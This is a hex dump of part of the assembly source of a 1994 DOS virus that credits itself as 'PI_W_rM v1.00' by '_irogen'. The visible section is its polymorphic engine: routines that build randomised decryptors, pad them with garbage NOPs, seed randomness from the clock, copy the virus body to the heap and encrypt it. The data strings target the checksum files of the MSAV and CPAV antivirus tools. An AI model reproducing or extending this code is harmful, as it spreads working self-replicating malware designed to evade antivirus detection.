|00004020| 74 20 49 4e 43 20 6f 70 | 0a 09 6d 6f 76 09 62 79 |t INC op|..mov.by|
|00004030| 74 65 20 70 74 72 20 77 | 6f 72 64 5f 69 6e 63 2c |te ptr w|ord_inc,|
|00004040| 63 68 09 3b 20 77 72 69 | 74 65 20 61 6e 6f 74 68 |ch.; wri|te anoth|
|00004050| 65 72 20 6f 6e 65 0a 09 | 75 73 65 5f 62 79 74 65 |er one..|use_byte|
|00004060| 3a 0a 0a 3b 2d 2d 2d 2d | 20 49 6e 63 72 65 6d 65 |:..;----| Increme|
|00004070| 6e 74 20 63 6f 75 6e 74 | 65 72 20 76 61 6c 75 65 |nt count|er value|
|00004080| 0a 0a 09 63 6d 70 09 62 | 79 74 65 20 70 74 72 20 |...cmp.b|yte ptr |
|00004090| 63 72 79 70 74 5f 62 79 | 74 65 73 2c 30 46 68 20 |crypt_by|tes,0Fh |
|000040a0| 3b 20 62 79 74 65 20 63 | 6f 75 6e 74 20 71 75 69 |; byte c|ount qui|
|000040b0| 74 65 20 6c 61 72 67 65 | 3f 0a 09 6a 6e 7a 09 69 |te large|?..jnz.i|
|000040c0| 6e 63 5f 63 6e 74 09 09 | 09 3b 20 69 66 20 6e 6f |nc_cnt..|.; if no|
|000040d0| 74 2e 2e 69 6e 63 72 65 | 6d 65 6e 74 20 61 77 61 |t..incre|ment awa|
|000040e0| 79 0a 09 6d 6f 76 09 63 | 72 79 70 74 5f 62 79 74 |y..mov.c|rypt_byt|
|000040f0| 65 73 2c 6f 66 66 73 65 | 74 20 76 65 6e 64 09 3b |es,offse|t vend.;|
|00004100| 20 65 6c 73 65 2e 2e 72 | 65 73 65 74 20 62 79 74 | else..r|eset byt|
|00004110| 65 20 63 6f 75 6e 74 0a | 09 69 6e 63 5f 63 6e 74 |e count.|.inc_cnt|
|00004120| 3a 0a 09 69 6e 63 09 63 | 72 79 70 74 5f 62 79 74 |:..inc.c|rypt_byt|
|00004130| 65 73 09 09 3b 20 69 6e | 63 72 65 6d 65 6e 74 20 |es..; in|crement |
|00004140| 62 79 74 65 20 63 6f 75 | 6e 74 0a 0a 0a 3b 2d 2d |byte cou|nt...;--|
|00004150| 2d 2d 20 53 65 74 20 44 | 45 43 20 58 58 20 2f 4a |-- Set D|EC XX /J|
|00004160| 4e 53 7c 4a 4e 5a 20 6f | 70 65 72 61 6e 64 73 0a |NS|JNZ o|perands.|
|00004170| 0a 09 6d 6f 76 09 64 69 | 2c 64 65 63 5f 6f 70 5f |..mov.di|,dec_op_|
|00004180| 70 74 72 0a 09 63 6d 70 | 09 64 69 2c 64 6a 5f 62 |ptr..cmp|.di,dj_b|
|00004190| 75 66 5f 73 69 7a 65 2d | 32 0a 09 6a 6c 09 67 6f |uf_size-|2..jl.go|
|000041a0| 6f 64 5f 64 65 63 5f 6f | 70 0a 09 6d 6f 76 09 64 |od_dec_o|p..mov.d|
|000041b0| 65 63 5f 6f 70 5f 70 74 | 72 2c 30 0a 09 78 6f 72 |ec_op_pt|r,0..xor|
|000041c0| 09 64 69 2c 64 69 0a 09 | 67 6f 6f 64 5f 64 65 63 |.di,di..|good_dec|
|000041d0| 5f 6f 70 3a 0a 09 69 6e | 63 09 64 65 63 5f 6f 70 |_op:..in|c.dec_op|
|000041e0| 5f 70 74 72 0a 09 6e 6f | 5f 69 6e 63 5f 64 65 63 |_ptr..no|_inc_dec|
|000041f0| 5f 6f 70 3a 0a 09 61 64 | 64 09 64 69 2c 6f 66 66 |_op:..ad|d.di,off|
|00004200| 73 65 74 20 64 6a 5f 62 | 75 66 0a 09 6c 65 61 09 |set dj_b|uf..lea.|
|00004210| 73 69 2c 64 65 63 5f 6f | 70 0a 09 6d 6f 76 73 77 |si,dec_o|p..movsw|
|00004220| 0a 09 6d 6f 76 73 62 0a | 09 69 6e 63 09 64 69 09 |..movsb.|.inc.di.|
|00004230| 09 09 3b 77 6f 72 64 20 | 61 6c 69 67 6e 0a 09 61 |..;word |align..a|
|00004240| 64 64 09 72 65 6c 5f 6f | 66 66 2c 64 69 09 09 3b |dd.rel_o|ff,di..;|
|00004250| 63 68 67 20 6f 66 66 73 | 65 74 20 66 6f 72 20 64 |chg offs|et for d|
|00004260| 65 63 72 79 70 74 69 6f | 6e 0a 09 70 75 73 68 09 |ecryptio|n..push.|
|00004270| 64 69 09 09 09 3b 73 61 | 76 65 20 6f 66 66 73 65 |di...;sa|ve offse|
|00004280| 74 20 61 66 74 65 72 20 | 6a 6d 70 0a 0a 3b 2d 2d |t after |jmp..;--|
|00004290| 2d 2d 20 53 65 74 20 4d | 4f 56 20 44 49 2c 58 58 |-- Set M|OV DI,XX|
|000042a0| 58 58 7c 4d 4f 56 20 53 | 49 2c 58 58 58 58 0a 0a |XX|MOV S|I,XXXX..|
|000042b0| 09 6d 6f 76 09 64 69 2c | 70 74 72 5f 6f 70 5f 70 |.mov.di,|ptr_op_p|
|000042c0| 74 72 0a 09 63 6d 70 09 | 64 69 2c 70 74 72 5f 62 |tr..cmp.|di,ptr_b|
|000042d0| 75 66 5f 73 69 7a 65 2d | 33 0a 09 6a 6c 09 67 6f |uf_size-|3..jl.go|
|000042e0| 6f 64 5f 70 74 72 5f 6f | 70 0a 09 6d 6f 76 09 70 |od_ptr_o|p..mov.p|
|000042f0| 74 72 5f 6f 70 5f 70 74 | 72 2c 30 0a 09 78 6f 72 |tr_op_pt|r,0..xor|
|00004300| 09 64 69 2c 64 69 0a 09 | 67 6f 6f 64 5f 70 74 72 |.di,di..|good_ptr|
|00004310| 5f 6f 70 3a 0a 09 74 65 | 73 74 09 64 6c 2c 30 30 |_op:..te|st.dl,00|
|00004320| 30 30 31 30 30 30 62 0a | 09 6a 7a 09 6e 6f 5f 69 |001000b.|.jz.no_i|
|00004330| 6e 63 5f 70 74 72 5f 6f | 70 0a 09 69 6e 63 09 70 |nc_ptr_o|p..inc.p|
|00004340| 74 72 5f 6f 70 5f 70 74 | 72 0a 09 6e 6f 5f 69 6e |tr_op_pt|r..no_in|
|00004350| 63 5f 70 74 72 5f 6f 70 | 3a 0a 09 61 64 64 09 64 |c_ptr_op|:..add.d|
|00004360| 69 2c 6f 66 66 73 65 74 | 20 70 74 72 5f 62 75 66 |i,offset| ptr_buf|
|00004370| 0a 09 6c 65 61 09 73 69 | 2c 70 74 72 5f 73 65 74 |..lea.si|,ptr_set|
|00004380| 0a 09 6d 6f 76 73 77 0a | 09 6d 6f 76 73 62 0a 0a |..movsw.|.movsb..|
|00004390| 3b 2d 2d 2d 2d 20 53 65 | 74 20 4d 4f 56 20 41 58 |;---- Se|t MOV AX|
|000043a0| 7c 42 58 7c 44 58 7c 43 | 58 2c 58 58 58 58 0a 0a ||BX|DX|C|X,XXXX..|
|000043b0| 09 6d 6f 76 09 64 69 2c | 63 6f 75 6e 74 5f 6f 70 |.mov.di,|count_op|
|000043c0| 5f 70 74 72 0a 09 63 6d | 70 09 64 69 2c 63 6e 74 |_ptr..cm|p.di,cnt|
|000043d0| 5f 62 75 66 5f 73 69 7a | 65 2d 33 0a 09 6a 6c 09 |_buf_siz|e-3..jl.|
|000043e0| 67 6f 6f 64 5f 63 6f 75 | 6e 74 5f 6f 70 0a 09 6d |good_cou|nt_op..m|
|000043f0| 6f 76 09 63 6f 75 6e 74 | 5f 6f 70 5f 70 74 72 2c |ov.count|_op_ptr,|
|00004400| 30 0a 09 78 6f 72 09 64 | 69 2c 64 69 0a 09 67 6f |0..xor.d|i,di..go|
|00004410| 6f 64 5f 63 6f 75 6e 74 | 5f 6f 70 3a 0a 09 74 65 |od_count|_op:..te|
|00004420| 73 74 09 64 6c 2c 30 30 | 30 31 30 30 30 30 62 0a |st.dl,00|010000b.|
|00004430| 09 6a 7a 09 6e 6f 5f 69 | 6e 63 5f 63 6f 75 6e 74 |.jz.no_i|nc_count|
|00004440| 5f 6f 70 0a 09 69 6e 63 | 09 63 6f 75 6e 74 5f 6f |_op..inc|.count_o|
|00004450| 70 5f 70 74 72 0a 09 6e | 6f 5f 69 6e 63 5f 63 6f |p_ptr..n|o_inc_co|
|00004460| 75 6e 74 5f 6f 70 3a 0a | 09 61 64 64 09 64 69 2c |unt_op:.|.add.di,|
|00004470| 6f 66 66 73 65 74 20 63 | 6e 74 5f 62 75 66 0a 09 |offset c|nt_buf..|
|00004480| 6c 65 61 09 73 69 2c 63 | 6f 75 6e 74 5f 6f 70 0a |lea.si,c|ount_op.|
|00004490| 09 6d 6f 76 73 77 0a 09 | 6d 6f 76 73 62 0a 0a 3b |.movsw..|movsb..;|
|000044a0| 2d 2d 2d 2d 20 53 65 74 | 20 58 4f 52 7c 41 44 44 |---- Set| XOR|ADD|
|000044b0| 26 53 55 42 20 57 4f 52 | 44 7c 42 59 54 45 20 43 |&SUB WOR|D|BYTE C|
|000044c0| 53 3a 7c 44 53 3a 5b 53 | 49 7c 44 49 5d 2c 58 58 |S:|DS:[S|I|DI],XX|
|000044d0| 7c 58 58 58 58 0a 0a 09 | 6d 6f 76 09 64 69 2c 65 ||XXXX...|mov.di,e|
|000044e0| 6e 63 5f 6f 70 5f 70 74 | 72 0a 09 63 6d 70 09 64 |nc_op_pt|r..cmp.d|
|000044f0| 69 2c 65 6e 63 5f 6f 70 | 5f 62 73 69 7a 65 2d 35 |i,enc_op|_bsize-5|
|00004500| 0a 09 6a 6c 09 67 6f 6f | 64 5f 65 6e 63 5f 70 74 |..jl.goo|d_enc_pt|
|00004510| 72 0a 09 6d 6f 76 09 65 | 6e 63 5f 6f 70 5f 70 74 |r..mov.e|nc_op_pt|
|00004520| 72 2c 30 0a 09 78 6f 72 | 09 64 69 2c 64 69 0a 09 |r,0..xor|.di,di..|
|00004530| 67 6f 6f 64 5f 65 6e 63 | 5f 70 74 72 3a 0a 09 74 |good_enc|_ptr:..t|
|00004540| 65 73 74 09 64 6c 2c 30 | 30 30 30 30 31 30 30 62 |est.dl,0|0000100b|
|00004550| 0a 09 6a 7a 09 6e 6f 5f | 69 6e 63 5f 65 6e 63 5f |..jz.no_|inc_enc_|
|00004560| 70 74 72 0a 09 69 6e 63 | 09 65 6e 63 5f 6f 70 5f |ptr..inc|.enc_op_|
|00004570| 70 74 72 0a 09 6e 6f 5f | 69 6e 63 5f 65 6e 63 5f |ptr..no_|inc_enc_|
|00004580| 70 74 72 3a 0a 09 61 64 | 64 09 64 69 2c 6f 66 66 |ptr:..ad|d.di,off|
|00004590| 73 65 74 20 65 6e 63 5f | 6f 70 5f 62 75 66 0a 09 |set enc_|op_buf..|
|000045a0| 6d 6f 76 09 62 78 2c 64 | 69 09 09 09 3b 20 42 58 |mov.bx,d|i...; BX|
|000045b0| 20 70 6f 69 6e 74 73 20 | 74 6f 20 65 6e 63 72 79 | points |to encry|
|000045c0| 74 6f 72 20 70 6f 73 2e | 0a 09 6c 65 61 09 73 69 |tor pos.|..lea.si|
|000045d0| 2c 73 65 67 5f 6f 70 0a | 09 6d 6f 76 73 77 0a 09 |,seg_op.|.movsw..|
|000045e0| 6d 6f 76 73 77 0a 0a 3b | 2d 2d 2d 2d 20 46 69 58 |movsw..;|---- FiX|
|000045f0| 20 73 65 63 6f 6e 64 20 | 63 72 79 70 74 6f 72 20 | second |cryptor |
|00004600| 6f 66 66 73 65 74 0a 0a | 49 46 20 53 45 43 4f 4e |offset..|IF SECON|
|00004610| 44 5f 43 52 59 50 54 0a | 09 6d 6f 76 09 72 65 6c |D_CRYPT.|.mov.rel|
|00004620| 32 5f 6f 66 66 2c 6f 66 | 66 73 65 74 20 68 65 61 |2_off,of|fset hea|
|00004630| 70 09 3b 66 69 72 73 74 | 20 67 65 6e 20 68 61 73 |p.;first| gen has|
|00004640| 20 6d 69 73 70 6c 2e 20 | 6f 66 66 0a 45 4e 44 49 | mispl. |off.ENDI|
|00004650| 46 0a 0a 3b 2d 2d 2d 2d | 20 43 6f 70 79 20 76 69 |F..;----| Copy vi|
|00004660| 72 75 73 20 63 6f 64 65 | 20 61 6c 6f 6e 67 20 77 |rus code| along w|
|00004670| 69 74 68 20 64 65 63 72 | 79 70 74 6f 72 20 74 6f |ith decr|yptor to|
|00004680| 20 68 65 61 70 0a 0a 09 | 6d 6f 76 09 63 78 2c 20 | heap...|mov.cx, |
|00004690| 28 6f 66 66 73 65 74 20 | 68 65 61 70 2d 6f 66 66 |(offset |heap-off|
|000046a0| 73 65 74 20 73 74 61 72 | 74 29 2f 32 2b 31 0a 09 |set star|t)/2+1..|
|000046b0| 78 6f 72 09 73 69 2c 73 | 69 0a 20 20 20 20 20 20 |xor.si,s|i. |
|000046c0| 20 20 6c 65 61 20 20 20 | 20 20 64 69 2c 76 65 6e | lea | di,ven|
|000046d0| 64 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |d | |
|000046e0| 20 20 3b 20 2e 2e 74 6f | 20 68 65 61 70 20 66 6f | ; ..to| heap fo|
|000046f0| 72 20 65 6e 63 72 79 70 | 74 69 6f 6e 0a 09 72 65 |r encryp|tion..re|
|00004700| 70 09 6d 6f 76 73 77 09 | 09 09 3b 20 6d 61 6b 65 |p.movsw.|..; make|
|00004710| 20 61 6e 6f 74 68 65 72 | 20 63 6f 70 79 20 6f 66 | another| copy of|
|00004720| 20 76 69 72 75 73 0a 0a | 49 46 20 53 45 43 4f 4e | virus..|IF SECON|
|00004730| 44 5f 43 52 59 50 54 0a | 3b 2d 2d 2d 2d 20 43 61 |D_CRYPT.|;---- Ca|
|00004740| 6c 6c 20 73 65 63 6f 6e | 64 20 65 6e 63 72 79 70 |ll secon|d encryp|
|00004750| 74 6f 72 20 66 69 72 73 | 74 0a 0a 09 6d 6f 76 09 |tor firs|t...mov.|
|00004760| 73 69 2c 6f 66 66 73 65 | 74 20 76 65 6e 64 09 09 |si,offse|t vend..|
|00004770| 3b 20 6f 66 66 73 65 74 | 20 6f 66 20 65 6e 63 2e |; offset| of enc.|
|00004780| 20 73 74 61 72 74 2e 2e | 0a 09 61 64 64 09 73 69 | start..|..add.si|
|00004790| 2c 6f 66 66 73 65 74 20 | 68 65 61 70 09 09 3b 20 |,offset |heap..; |
|000047a0| 2e 2e 61 74 20 65 6e 64 | 20 6f 66 20 63 6f 64 65 |..at end| of code|
|000047b0| 0a 09 6d 6f 76 09 72 65 | 74 32 5f 62 79 74 65 2c |..mov.re|t2_byte,|
|000047c0| 30 43 33 68 0a 09 78 6f | 72 09 62 70 2c 62 70 0a |0C3h..xo|r.bp,bp.|
|000047d0| 09 70 75 73 68 09 61 78 | 20 62 78 0a 09 63 61 6c |.push.ax| bx..cal|
|000047e0| 6c 09 64 62 6c 5f 63 72 | 79 70 74 0a 09 70 6f 70 |l.dbl_cr|ypt..pop|
|000047f0| 09 62 78 20 61 78 0a 09 | 6d 6f 76 09 72 65 74 32 |.bx ax..|mov.ret2|
|00004800| 5f 62 79 74 65 2c 39 30 | 68 0a 45 4e 44 49 46 0a |_byte,90|h.ENDIF.|
|00004810| 0a 3b 2d 2d 2d 2d 20 53 | 65 74 20 70 74 72 20 74 |.;---- S|et ptr t|
|00004820| 6f 20 68 65 61 70 20 66 | 6f 72 20 65 6e 63 72 79 |o heap f|or encry|
|00004830| 70 74 69 6f 6e 0a 0a 09 | 70 6f 70 09 73 69 09 09 |ption...|pop.si..|
|00004840| 09 3b 20 70 6f 70 20 6f | 66 66 73 65 74 20 61 66 |.; pop o|ffset af|
|00004850| 74 65 72 20 6a 6d 70 0a | 09 61 64 64 09 73 69 2c |ter jmp.|.add.si,|
|00004860| 6f 66 66 73 65 74 20 76 | 65 6e 64 09 09 3b 20 6f |offset v|end..; o|
|00004870| 66 66 73 65 74 20 77 65 | 27 7a 20 62 65 7a 20 65 |ffset we|'z bez e|
|00004880| 6e 63 72 79 70 74 69 6e | 67 0a 09 6d 6f 76 09 64 |ncryptin|g..mov.d|
|00004890| 69 2c 73 69 09 09 09 3b | 20 77 65 20 6d 69 67 68 |i,si...;| we migh|
|000048a0| 74 20 62 65 20 75 73 69 | 6e 67 20 44 49 20 74 6f |t be usi|ng DI to|
|000048b0| 6f 0a 0a 3b 2d 2d 2d 2d | 20 45 6e 63 72 79 70 74 |o..;----| Encrypt|
|000048c0| 20 74 68 65 20 6d 6f 74 | 68 65 72 20 66 75 63 6b | the mot|her fuck|
|000048d0| 65 72 0a 0a 09 6d 6f 76 | 09 72 65 74 5f 62 79 74 |er...mov|.ret_byt|
|000048e0| 65 2c 30 43 33 68 09 09 | 3b 20 70 75 74 20 52 45 |e,0C3h..|; put RE|
|000048f0| 54 0a 09 6d 6f 76 09 62 | 79 74 65 20 70 74 72 20 |T..mov.b|yte ptr |
|00004900| 5b 62 78 2b 32 5d 2c 61 | 6c 09 3b 20 73 65 74 20 |[bx+2],a|l.; set |
|00004910| 65 6e 63 72 79 70 74 69 | 6f 6e 20 74 79 70 65 0a |encrypti|on type.|
|00004920| 09 63 61 6c 6c 09 65 6e | 63 72 79 70 74 6f 72 09 |.call.en|cryptor.|
|00004930| 09 3b 20 65 6e 63 72 79 | 70 74 20 74 68 65 20 62 |.; encry|pt the b|
|00004940| 69 74 63 68 0a 0a 09 70 | 6f 70 09 62 78 09 09 09 |itch...p|op.bx...|
|00004950| 3b 20 72 65 73 74 6f 72 | 65 20 70 68 69 6c 65 20 |; restor|e phile |
|00004960| 68 61 6e 64 6c 65 0a 09 | 72 65 74 09 09 09 09 3b |handle..|ret....;|
|00004970| 20 72 65 74 75 72 6e 0a | 0a 3b 2d 2d 2d 2d 2d 2d | return.|.;------|
|00004980| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00004990| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|000049a0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 0a 3b 20 46 69 6c 6c |--------|-.; Fill|
|000049b0| 20 62 75 66 66 65 72 20 | 77 69 74 68 20 72 61 6e | buffer |with ran|
|000049c0| 64 6f 6d 20 67 61 72 62 | 61 67 65 20 66 72 6f 6d |dom garb|age from|
|000049d0| 20 74 61 62 6c 65 0a 3b | 20 20 44 49 3d 6f 66 66 | table.;| DI=off|
|000049e0| 20 42 50 3d 73 69 7a 65 | 0a 3b 20 20 72 65 74 3a | BP=size|.; ret:|
|000049f0| 20 42 4c 3d 6c 61 73 74 | 20 67 61 72 62 61 67 65 | BL=last| garbage|
|00004a00| 20 62 79 74 65 0a 3b 0a | 3b 20 20 44 65 63 65 6e | byte.;.|; Decen|
|00004a10| 74 6c 79 20 72 61 6e 64 | 6f 6d 2e 2e 72 65 6c 69 |tly rand|om..reli|
|00004a20| 65 73 20 6f 6e 20 70 72 | 65 76 69 6f 75 73 6c 79 |es on pr|eviously|
|00004a30| 20 65 6e 63 72 79 70 74 | 65 64 20 64 61 74 61 20 | encrypt|ed data |
|00004a40| 61 6e 64 20 4d 53 20 66 | 72 6f 6d 20 63 6c 6f 63 |and MS f|rom cloc|
|00004a50| 6b 0a 3b 20 20 74 6f 20 | 66 6f 72 6d 20 70 6f 69 |k.; to |form poi|
|00004a60| 6e 74 65 72 20 74 6f 20 | 74 68 65 20 6e 65 78 74 |nter to |the next|
|00004a70| 20 6f 70 65 72 61 6e 64 | 20 74 6f 20 75 73 65 2e | operand| to use.|
|00004a80| 2e 0a 3b 0a 3b 0a 66 69 | 6c 6c 5f 62 75 66 66 65 |..;.;.fi|ll_buffe|
|00004a90| 72 3a 0a 09 61 64 64 09 | 62 6c 2c 64 6c 09 09 09 |r:..add.|bl,dl...|
|00004aa0| 3b 20 70 72 65 76 69 6f | 75 73 20 4e 4f 50 2b 70 |; previo|us NOP+p|
|00004ab0| 72 65 76 69 6f 75 73 20 | 4e 4f 50 20 6f 66 66 0a |revious |NOP off.|
|00004ac0| 09 63 61 6c 6c 09 67 65 | 74 5f 72 61 6e 64 6f 6d |.call.ge|t_random|
|00004ad0| 0a 49 46 20 53 45 43 4f | 4e 44 5f 43 52 59 50 54 |.IF SECO|ND_CRYPT|
|00004ae0| 0a 20 20 20 20 20 20 20 | 20 6d 6f 76 20 20 20 20 |. | mov |
|00004af0| 20 62 79 74 65 20 70 74 | 72 20 73 65 63 5f 65 6e | byte pt|r sec_en|
|00004b00| 63 2c 63 6c 20 20 20 20 | 20 3b 20 75 73 65 20 43 |c,cl | ; use C|
|00004b10| 4c 5c 44 4c 20 66 6f 72 | 20 32 6e 64 20 65 6e 63 |L\DL for| 2nd enc|
|00004b20| 72 79 70 74 6f 72 0a 09 | 6d 6f 76 09 62 79 74 65 |ryptor..|mov.byte|
|00004b30| 20 70 74 72 20 73 65 63 | 5f 65 6e 63 2b 31 2c 64 | ptr sec|_enc+1,d|
|00004b40| 68 0a 45 4e 44 49 46 0a | 09 63 6d 70 09 64 68 2c |h.ENDIF.|.cmp.dh,|
|00004b50| 35 09 09 09 3b 20 75 73 | 65 20 72 61 6e 64 6f 6d |5...; us|e random|
|00004b60| 20 4e 4f 50 73 20 6f 72 | 20 63 6f 6e 73 74 61 6e | NOPs or| constan|
|00004b70| 74 20 4e 4f 50 3f 0a 09 | 6a 67 09 75 73 65 5f 72 |t NOP?..|jg.use_r|
|00004b80| 61 6e 64 0a 09 78 6f 72 | 09 64 78 2c 64 78 0a 09 |and..xor|.dx,dx..|
|00004b90| 6a 6d 70 09 63 6f 6e 73 | 74 61 6e 74 0a 75 73 65 |jmp.cons|tant.use|
|00004ba0| 5f 72 61 6e 64 3a 0a 09 | 61 64 64 09 64 6c 2c 62 |_rand:..|add.dl,b|
|00004bb0| 79 74 65 20 70 74 72 20 | 76 65 6e 64 2b 32 30 30 |yte ptr |vend+200|
|00004bc0| 68 5b 64 69 5d 20 3b 20 | 65 6e 63 72 79 70 74 65 |h[di] ; |encrypte|
|00004bd0| 64 20 62 79 74 65 20 73 | 6f 6d 65 77 68 65 72 65 |d byte s|omewhere|
|00004be0| 2e 2e 0a 09 73 75 62 09 | 64 6c 2c 62 6c 0a 09 61 |....sub.|dl,bl..a|
|00004bf0| 6e 64 09 64 6c 2c 30 30 | 30 30 31 31 31 31 62 09 |nd.dl,00|001111b.|
|00004c00| 09 3b 20 65 78 74 72 61 | 63 74 20 6c 6f 77 65 72 |.; extra|ct lower|
|00004c10| 20 6e 69 62 62 6c 65 0a | 09 78 6f 72 09 64 68 2c | nibble.|.xor.dh,|
|00004c20| 64 68 0a 63 6f 6e 73 74 | 61 6e 74 3a 20 6d 6f 76 |dh.const|ant: mov|
|00004c30| 09 73 69 2c 64 78 09 09 | 09 3b 20 62 75 69 6c 64 |.si,dx..|.; build|
|00004c40| 20 69 6e 64 65 78 20 70 | 74 72 0a 09 6d 6f 76 09 | index p|tr..mov.|
|00004c50| 62 6c 2c 62 79 74 65 20 | 70 74 72 20 5b 6e 6f 70 |bl,byte |ptr [nop|
|00004c60| 73 2b 73 69 5d 09 3b 20 | 67 65 74 20 4e 4f 50 20 |s+si].; |get NOP |
|00004c70| 66 72 6f 6d 20 74 61 62 | 6c 65 0a 09 6d 6f 76 09 |from tab|le..mov.|
|00004c80| 62 79 74 65 20 70 74 72 | 20 5b 64 69 5d 2c 62 6c |byte ptr| [di],bl|
|00004c90| 0a 09 69 6e 63 09 64 69 | 09 09 09 3b 20 69 6e 63 |..inc.di|...; inc|
|00004ca0| 72 65 6d 65 6e 74 20 62 | 75 66 66 65 72 20 70 74 |rement b|uffer pt|
|00004cb0| 72 0a 09 64 65 63 09 62 | 70 0a 09 6a 6e 7a 09 66 |r..dec.b|p..jnz.f|
|00004cc0| 69 6c 6c 5f 62 75 66 66 | 65 72 09 09 3b 20 6c 6f |ill_buff|er..; lo|
|00004cd0| 6f 70 0a 09 72 65 74 0a | 3b 2d 2d 2d 2d 2d 2d 2d |op..ret.|;-------|
|00004ce0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00004cf0| 2d 2d 2d 0a 3b 20 67 65 | 74 20 74 69 6d 65 20 6d |---.; ge|t time m|
|00004d00| 61 6e 20 2d 20 61 6e 64 | 20 75 73 65 20 69 74 20 |an - and| use it |
|00004d10| 61 73 20 73 65 6d 69 2d | 72 61 6e 64 6f 6d 20 77 |as semi-|random w|
|00004d20| 6f 72 64 0a 3b 0a 67 65 | 74 5f 72 61 6e 64 6f 6d |ord.;.ge|t_random|
|00004d30| 3a 0a 09 6d 6f 76 09 61 | 68 2c 32 63 68 09 09 09 |:..mov.a|h,2ch...|
|00004d40| 3b 20 67 65 74 20 63 6c | 6f 63 6b 0a 09 69 6e 74 |; get cl|ock..int|
|00004d50| 09 32 31 68 0a 09 72 65 | 74 0a 0a 3b 2d 2d 2d 2d |.21h..re|t..;----|
|00004d60| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00004d70| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00004d80| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00004d90| 2d 2d 2d 2d 2d 2d 0a 3b | 20 41 73 73 6f 63 69 61 |------.;| Associa|
|00004da0| 74 65 64 20 62 75 6c 6c | 73 68 69 74 0a 3b 0a 63 |ted bull|shit.;.c|
|00004db0| 72 65 64 69 74 73 09 64 | 62 09 27 20 5f 20 50 49 |redits.d|b.' _ PI|
|00004dc0| 5f 57 5f 72 4d 5f 76 31 | 2e 30 30 20 2d 20 43 6f |_W_rM_v1|.00 - Co|
|00004dd0| 64 65 64 20 62 79 20 5f | 69 72 6f 67 65 6e 20 69 |ded by _|irogen i|
|00004de0| 6e 20 41 70 72 69 6c 20 | 31 39 39 34 27 0a 63 68 |n April |1994'.ch|
|00004df0| 6b 6c 31 09 64 62 09 27 | 43 48 4b 4c 49 53 54 2e |kl1.db.'|CHKLIST.|
|00004e00| 4d 53 27 2c 30 09 09 3b | 20 4d 53 41 56 20 73 68 |MS',0..;| MSAV sh|
|00004e10| 69 74 74 79 20 63 68 65 | 63 6b 73 75 6d 0a 63 68 |itty che|cksum.ch|
|00004e20| 6b 6c 32 09 64 62 09 27 | 43 48 4b 4c 49 53 54 2e |kl2.db.'|CHKLIST.|
|00004e30| 43 50 53 27 2c 30 09 09 | 3b 20 43 50 41 56 20 73 |CPS',0..|; CPAV s|
|00004e40| 68 69 74 74 79 20 63 68 | 65 63 6b 73 75 6d 0a 70 |hitty ch|ecksum.p|
|00004e50| 69 6e 5f 64 69 72 09 64 | 62 09 32 35 35 2c 27 50 |in_dir.d|b.255,'P|
|00004e60| 49 5f 57 5f 72 4d 2e 5f | 67 21 27 2c 30 09 3b 20 |I_W_rM._|g!',0.; |
|00004e70| 44 49 52 20 63 72 65 61 | 74 65 64 0a 72 6f 6f 74 |DIR crea|ted.root|
|00004e80| 09 64 62 09 27 2e 2e 27 | 2c 30 09 09 09 3b 20 66 |.db.'..'|,0...; f|
|00004e90| 6f 72 20 63 68 61 6e 67 | 69 6e 67 20 74 6f 20 6f |or chang|ing to o|
|00004ea0| 72 67 2e 20 64 69 72 0a | 66 69 6c 65 31 20 20 20 |rg. dir.|file1 |
|00004eb0| 64 62 20 20 20 20 20 20 | 27 49 5f 68 6f 70 65 5f |db |'I_hope_|
|00004ec0| 79 27 2c 30 20 20 20 20 | 20 20 20 20 20 20 20 20 |y',0 | |
|00004ed0| 3b 20 66 69 6c 65 7a 20 | 63 72 65 61 74 65 64 20 |; filez |created |
|00004ee0| 69 6e 20 64 69 72 2e 2e | 0a 09 64 62 09 27 6f 75 |in dir..|..db.'ou|
|00004ef0| 5f 68 61 76 65 5f 27 2c | 30 09 09 3b 20 6d 75 73 |_have_',|0..; mus|
|00004f00| 74 20 62 65 20 38 20 63 | 68 61 72 73 20 65 61 63 |t be 8 c|hars eac|
|00004f10| 68 2b 6e 75 6c 6c 0a 09 | 64 62 09 27 65 6e 6a 6f |h+null..|db.'enjo|
|00004f20| 79 65 64 5f 27 2c 30 09 | 09 3b 20 28 32 35 35 20 |yed_',0.|.; (255 |
|00004f30| 6e 6f 74 20 73 70 61 63 | 65 29 0a 09 64 62 09 27 |not spac|e)..db.'|
|00004f40| 79 6f 75 72 5f 69 6e 66 | 27 2c 30 0a 09 64 62 09 |your_inf|',0..db.|
|00004f50| 27 65 73 74 61 74 69 6f | 6e 27 2c 30 0a 09 64 62 |'estatio|n',0..db|
|00004f60| 09 27 5f 62 79 5f 74 68 | 65 5f 27 2c 30 0a 09 64 |.'_by_th|e_',0..d|
|00004f70| 62 09 27 6d 69 67 68 74 | 79 20 50 27 2c 30 0a 09 |b.'might|y P',0..|
|00004f80| 64 62 09 27 69 6e 77 6f | 72 6d 20 70 27 2c 30 0a |db.'inwo|rm p',0.|
|00004f90| 09 64 62 09 27 61 72 61 | 73 69 74 65 b7 27 2c 30 |.db.'ara|site.',0|
|00004fa0| 0a 09 64 62 09 27 b7 b7 | b7 b7 b7 b7 b7 b7 27 2c |..db.'..|......',|
|00004fb0| 30 0a 09 64 62 09 27 46 | 75 63 6b 5f 79 6f 75 27 |0..db.'F|uck_you'|
|00004fc0| 2c 30 0a 09 64 62 09 27 | 61 6c 6c 21 5f 5f 5f 5f |,0..db.'|all!____|
|00004fd0| 27 2c 30 0a 20 20 20 20 | 20 20 20 20 64 62 20 20 |',0. | db |
|00004fe0| 20 20 20 20 27 2d 5f 69 | 72 6f 67 65 6e 27 2c 30 | '-_i|rogen',0|
|00004ff0| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 20 23 31 | | ; #1|
|00005000| 33 0a 6e 65 77 5f 6a 6d | 70 20 64 62 20 20 20 20 |3.new_jm|p db |
